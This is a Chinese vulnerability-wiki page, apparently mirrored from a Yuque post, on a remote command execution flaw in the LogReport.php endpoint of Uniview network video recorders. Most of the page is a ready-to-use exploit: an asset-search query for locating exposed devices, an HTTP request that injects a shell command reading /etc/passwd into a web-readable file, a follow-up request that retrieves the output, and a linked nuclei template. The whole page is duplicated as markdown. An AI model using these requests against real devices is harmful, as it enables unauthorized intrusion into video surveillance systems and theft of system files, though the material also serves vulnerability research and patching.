fofamini-wiki

登录白背景

源码

浙江宇视网络视频录像机 LogReport.php 远程命令执行

一、漏洞简介

浙江宇视科技有限公司(宇视uniview)创业于2011年,宇视是一家全球公共安全和智能交通的解决方案提供商,以可视、智慧、物联产品技术为核心的引领者。浙江宇视科技网络视频录像机系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。

二、影响版本

浙江宇视网络视频录像机

三、资产测绘

hunterweb.body="Alarm"&&web.body="白牌定制"
特征

四、漏洞复现

GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bcat%20/etc/passwd%3eqwer123.txt HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

获取命令执行结果

GET /Interface/LogReport/qwer123.txt HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Cookie: PHPSESSID=854b7f8a6d3fb343740627484f62886e
Accept-Encoding: gzip, deflate

nuclei脚本
yushi-isc-logreport-rce.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/fywx9ig1g1f4g42w

# 浙江宇视网络视频录像机 LogReport.php 远程命令执行

# 一、漏洞简介
浙江宇视科技有限公司(宇视uniview)创业于2011年,宇视是一家全球公共安全和智能交通的解决方案提供商,以可视、智慧、物联产品技术为核心的引领者。浙江宇视科技 网络视频录像机系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。

# 二、影响版本

- 浙江宇视网络视频录像机

# 三、资产测绘

- hunter`web.body="Alarm"&&web.body="白牌定制"`
- 特征

![image.png](./img/v0B50UD5k9xLwMVe/1702872611878-f3a32d8c-3739-407e-8635-dc2a7696e64a-796103.png)

# 四、漏洞复现
```
GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bcat%20/etc/passwd%3eqwer123.txt HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
```
![image.png](./img/v0B50UD5k9xLwMVe/1702872649040-2b06f613-e06a-4ce0-943e-0aeb713dd3be-690624.png)
获取命令执行结果
```
GET /Interface/LogReport/qwer123.txt HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Cookie: PHPSESSID=854b7f8a6d3fb343740627484f62886e
Accept-Encoding: gzip, deflate
```
![image.png](./img/v0B50UD5k9xLwMVe/1702872685034-9791e017-0e03-4589-905e-fe8f68825258-790830.png)
nuclei脚本
[yushi-isc-logreport-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231772-32bf72bc-329e-4b6b-b589-87e622a98850.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709222231772-32bf72bc-329e-4b6b-b589-87e622a98850.yaml%22%2C%22name%22%3A%22yushi-isc-logreport-rce.yaml%22%2C%22size%22%3A1113%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22uf77d621d-0565-4f34-bc41-095612f827c%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22u7a4dab8c%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fywx9ig1g1f4g42w>